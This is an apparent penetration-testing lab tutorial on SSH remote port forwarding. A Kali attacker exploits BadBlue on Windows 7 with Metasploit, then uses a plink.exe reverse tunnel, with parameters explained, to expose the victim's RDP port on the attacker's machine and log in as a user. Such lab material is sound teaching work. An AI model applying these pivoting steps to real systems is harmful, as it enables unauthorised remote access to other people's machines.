SSH TUNNELING (II): REMOTE PORT FORWARDING
- Layout for this exercise:
* This exercise is a continuation of the previous one
http://www.whitelist1.com/2017/10/ssh-tunneling-i-local-port-forwarding.html
1 - Exploiting Windows 7
- First of all Kali detects that Windows 7 has the vulnerable BadBlue service running on port 80:
- Exploiting the Windows 7 device with Metasploit:
2 - SSH Tunneling with REMOTE port forwarding
- Checking that Windows 7 is listening on port 3389 (Remote Desktop Protocol):
- In the same way, Kali detects that port 3389 is open:
- Plink.exe is a command-line connection tool typically used with the SSH protocol to enable to talk directly to a program running on the server:
- In case of not being present at the Windows 7 (it is included with PuTTY), plink.exe could be passed from the attacker Kali following these instructions:
http://www.whitelist1.com/2017/10/file-transfers-post-exploitation-with.html
- plink.exe help us to create a reverse SSH tunnel, exposing the RDP port on Kali's at port 3390:
- Let's see what are the parameters used in the previous command:
plink <- enables ssh connection
-l root -pw rootpassword <- user and password
192.168.1.27 <- attacker Kali
-R <- remote option
3390 <- local port at Kali
127.0.0.1 <- localhost Kali
3389 <- remote port at Windows 7
- Once the tunnel is created, we need another terminal for opening an RDP session:
- The new RDP session is created for user marie and her password:
- Finally the attack is successful, because Kali has got an RDP session available in its own desktop:
3 - Analyzing ESTABLISHED connections and corresponding ports with netstat
- Let's check what connections are ESTABLISHED at Windows7 and what corresponding ports are implied:
- Same information (symmetrical) from Kali:
- There is one connection from Kali to Windows 7 on port 3389 (RDP)
- There is a second connection from Kali to Windows 7 on port 4444 (Metasploit):
- There is a third connection from Kali to Windows 7 on port 22 (SSH):
